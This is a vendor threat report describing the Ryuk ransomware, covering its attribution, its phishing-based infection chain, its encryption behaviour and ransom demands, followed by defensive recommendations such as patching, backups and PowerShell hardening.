Ryuk Ransomware Increased Activity Targets Large Organizations Using Windows OS

Avertium Threat Report
Share on linkedin
Share on facebook
Share on twitter
Share on reddit
Share on email
Share on print

This report is an overview of the Ryuk ransomware and contains actionable intelligence for understanding and protecting against the malware threat.

Overview of Ryuk Ransomware

Discovered in 2018, this ransomware continues to attract publicity because of its impact on large organizations. Malware researchers have noted increased activity by the ransomware in recent months. Most recently, Ryuk successfully attacked Universal Health Services, one of the largest healthcare providers in the nation.

Ryuk has been attributed to a few threat actors with its origins traced to North Korea or Russia. The Russia-based Wizard Spider threat actor appears to be behind the ransomware attacks and is also credited with activity by the TrickBot malware.

Ryuk Ransomware Tactics, Techniques, and Procedures

Malware researchers believe Ryuk is a derivative of the older Hermes ransomware, as much of the same code is used by Ryuk. However, Ryuk has continued to develop beyond Hermes since its discovery. At this time only Windows OS devices appear to be targeted.

Like so much other malware, infection by Ryuk often begins with a phishing campaign. Phishing may be used to directly infect victims with the ransomware or may initially infect with Emotet or TrickBot. The threat actor may later decide to push out the Ryuk ransomware executable payload to encrypt the system. PowerShell scripts are commonly used for the download, leveraging tools like PowerShell Empire and PsExec. Avertium partner Sophos offers this graphic to depict an example chain of infection.

Ryuk ransomware chain of infection

Ryuk is distributed with a dropper for the actual executable payload. The dropper is not often seen, as it is deleted from the system once the payload runs. The dropper randomly generates the payload file name upon installation.

Before encryption, the malware checks the system to determine whether VirtualBox is being used or whether the language is Russian, Ukrainian, or Belarusian, and will not execute on these systems. Ryuk enumerates the network and all drives on the host to encrypt all mounted drives on the system and any hosts it can reach remotely. Ryuk uses RSA-2048 and AES-256 to encrypt the files. Once encrypted, a ransom note is placed on the system requesting Bitcoin payment for decryption of files.

The below example is provided by CrowdStrike:

Ryuk ransomware ransom note sample

What Ryuk Infection Means to You

  • Infection leads to data encryption or loss.
  • Sensitive business data may be leaked to the public.
  • Payments have been requested by Wizard Spider of up to 99 BTC, approximately $1,047,429.
  • The true cost of ransomware infections can be in far excess of the demand due to a variety of factors like system downtime.

What You Can Do About Ryuk

  • Provide users with training on best practices to avoid phishing, as well as awareness of recent trends in phishing campaigns.
  • Regularly update Windows hosts with recently released patches.
  • Update older versions of Windows to Windows 10 for increased security features.
  • Implement a regular backup schedule for systems, especially those with critical data.
  • Use Endpoint Protection with anti-ransomware features such as Sophos Intercept X.
  • Implement best practices and security features for PowerShell on your network.
    • Run PowerShell 5.0 or greater on systems requiring PowerShell.
    • Implement the privilege of least principle, only allowing PowerShell, and related tools like PsExec, to be run by users and hosts requiring it.
    • Enable script block logging and transcription to better log PowerShell activity.

Indicators of Compromise (IOCs)

MITRE Mapping(s)

Sources and Other Helpful Information

Contact us for more information about Avertium’s managed security service capabilities. 

This image has an empty alt attribute; its file name is 8-Steps-to-Take-if-Breached-featured-min.jpg

8 Steps to Take if You’ve Been Breached

With the prevalence, severity and sophistication of cybersecurity attacks growing by the day, businesses of all types and sizes are scrambling to protect themselves. This best practices guide takes you through the 8 essential steps to managing a data breach. Download now.

Note: The Avertium Threat Report analyzes one current threat that has been shared by threat intelligence networks across the globe. Used internally by the Avertium CyberOps Team, this report will outline a “top-of-mind” threat and how it ought to be addressed accordingly.

This informed analysis is based on the latest data available.

Share this:
Share on linkedin
Share on twitter
Share on facebook
Share on reddit
Share on email
Share on print

Sign-up for Weekly Updates